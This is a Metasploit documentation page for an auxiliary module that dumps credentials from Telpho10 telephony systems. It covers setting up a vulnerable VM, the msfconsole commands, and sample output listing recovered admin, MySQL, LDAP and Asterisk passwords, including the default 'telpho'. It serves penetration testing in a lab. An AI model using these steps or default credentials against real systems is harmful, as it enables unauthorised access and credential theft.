CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/auxiliary/admin/http/telpho10_credential_dump.md
Views: 1904

Vulnerable Application

Telpho10 v2.6.31 (32-bit Linux ISO image download here).

Supporting documentation for this product can be found here.

Verification Steps

The following steps will allow you to install and dump the credentials from a Telpho10 instance:

  1. Download the Telpho10 ISO image and install in a VM (or on a system) - note that the ISO will default to a German keyboard layout - note that the ISO expects a SATA hard drive (not IDE/PATA) for installation

  2. configure the Telpho10's IP address - edit /etc/networks/interfaces accordingly

  3. Start msfconsole

  4. Do: use auxiliary/admin/http/telpho10_credential_dump

  5. Do: set RHOST <IP address of your Telpho10 instance>

  6. Do: run

  7. You should see a list of the retrieved Telpho10 credentials

Scenarios

Example output when using this against a Telpho10 v2.6.31 VM:

$ ./msfconsole
                                                
# cowsay++
____________
< metasploit >
------------
     \   ,__,
      \  (oo)____
         (__)    )\
            ||--|| *


     =[ metasploit v4.12.36-dev-16fc6c1                 ]
+ -- --=[ 1596 exploits - 908 auxiliary - 273 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use auxiliary/admin/http/telpho10_credential_dump
msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
RHOST => 10.0.2.35
msf auxiliary(telpho10_credential_dump) > run

[*] Generating backup
[*] Downloading backup
[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
[*] Dumping credentials

[*] Login (/telpho/login.php)
[*] -------------------------
[+] Username: admin
[+] Password: telpho

[*] MySQL (/phpmyadmin)
[*] -------------------
[+] Username: root
[+] Password: telpho

[*] LDAP (/phpldapadmin)
[*] --------------------
[+] Username: cn=admin,dc=localdomain
[+] Password: telpho

[*] Asterisk MI (port 5038)
[*] -----------------------
[+] Username: telpho
[+] Password: telpho

[*] Mail configuration
[*] ------------------
[+] Mailserver: 
[+] Username:   
[+] Password:   
[+] Mail from:  

[*] Online Backup
[*] -------------
[+] ID:       
[+] Password: 

[*] Auxiliary module execution completed
msf auxiliary(telpho10_credential_dump) >

I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:

msf auxiliary(telpho10_credential_dump) > run

[*] Generating backup
[*] Downloading backup
[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
[*] Dumping credentials

[*] Login (/telpho/login.php)
[*] -------------------------
[+] Username: admin
[+] Password: s3cr3t

[*] MySQL (/phpmyadmin)
[*] -------------------
[+] Username: root
[+] Password: telpho

[*] LDAP (/phpldapadmin)
[*] --------------------
[+] Username: cn=admin,dc=localdomain
[+] Password: ldaps3cr3t

[*] Asterisk MI (port 5038)
[*] -----------------------
[+] Username: telpho
[+] Password: asterisks3cr3t

[*] Mail configuration
[*] ------------------
[+] Mailserver: 
[+] Username:   
[+] Password:   
[+] Mail from:  

[*] Online Backup
[*] -------------
[+] ID:       
[+] Password: 

[*] Auxiliary module execution completed